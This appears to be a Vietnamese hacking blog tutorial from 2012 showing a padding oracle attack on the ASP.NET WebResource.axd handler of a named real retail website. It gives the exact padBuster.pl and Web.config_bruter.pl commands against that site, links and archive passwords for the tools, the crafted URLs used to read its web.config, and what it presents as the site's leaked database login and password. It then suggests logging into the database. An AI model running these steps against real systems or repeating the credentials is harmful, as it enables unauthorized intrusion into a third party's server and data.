21 thg 8, 2012
[TUT] Padding Oracle Attack
Victim: http://bigc.vn/Kiểm tra lỗi Padding Orale
View source:
Chú ý đoạn code sau:
/WebResource.axd?d=OpduU2rj_NJHaBhjNiUZ7g2&t=63 4538991637902500"
Bước 1: Chuẩn bị Tools
Trước tiên cần cài đặt perl:
http://www.activestate.com/activeperl/downloads
Coppy 2 file padBuster.pl và Web.config_bruter.pl sau vào ổ C:
padBuster.pl:
http://www.mediafire.com/?a0auo2tca0ffdfe
Web.config_bruter.pl:
http://www.mediafire.com/?3twc9xwizdcdw8p
pass unlock: soleil_vhb
pass giải nén: ceh.vn
Bước 2: Thực hiện lệnh trên CMD
vào Run command
Cd\
Chạy lệnh:
padBuster.pl http://bigc.vn/WebResource.axd?d=Opd...NJHaBhjNiUZ7g2OpduU2rj_NJHaBhjNiUZ7g2 8 -encoding 3 -plaintext "|||~/web.config"
Đến bước này đợi 1 lát, nó sẽ chạy cho đến dòng:
“The ID# marked with ** is recommended: “
Lúc này ta sẽ nhập số 2 và ấn enter
Chờ đợi tầm 30 phút chương trình sẽ giải mã ra giá trị sau:
M0-Q6vb5oiWPYJMC3WdcQgAAAAAAAAAA0
Sau khi có giá trị kết quả giải mã, thực hiện tiếp câu lệnh:
Web.config_bruter.pl http://bigc.vn/WebResource.axd M0-Q6vb5oiWPYJMC3WdcQgAAAAAAAAAA0 8
Đợi chương trình biên dịch xong ( Tầm 1 tiếng ) ta sẽ có kết quả như sau:
Kết quả:
u2LzoCD0ZcozT5Dq9vm iJY9gkwLdZ1xCAAAAAAAAAAA1
gPdbQmmzWIEzT5Dq9vmiJY9gkwLdZ1xCAAAAAAAAAAA1
Mỗi lần biên dịch, chương trình sẽ cho ra 1 giá trị khác nhau nhưng link đều đưa về cùng 1 kết quả
Bước 3: Lấy thông tin file config:
http://bigc.vn/ScriptResource.axd?d=...xCAAAAAAAAAAA1
hoặc:
http://bigc.vn/ScriptResource.axd?d=...xCAAAAAAAAAAA1
Ta được thông tin sau: ID=bigc;Password=RrmX6W6ODi
Bước 4: login vào Database
Sử dụng tool: MySQL management studio express
http://www.scottsystems.com/products..._ce/downloads/
Slide: http://www.mediafire.com/view/?u1qczh2b7ip45sw
![[Tutorial] XSS Bài 2: XSS Nâng cao + Bypass bộ lọc](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixEoUmpwXUmG6BwNUxkp2bx9LwFoIovVmTOD9ZZ_owzNehJ3jW-beXvaWzjpu7tCCpOzOkzIxz-wIwL9Dt8_YxyKl604U03Hd3Z1E3mlDvIB0u0IIf-WtvpXRfkgSv0Y9BzB9EkC6J0uI/s72-c/70.jpg)
Không có nhận xét nào:
Đăng nhận xét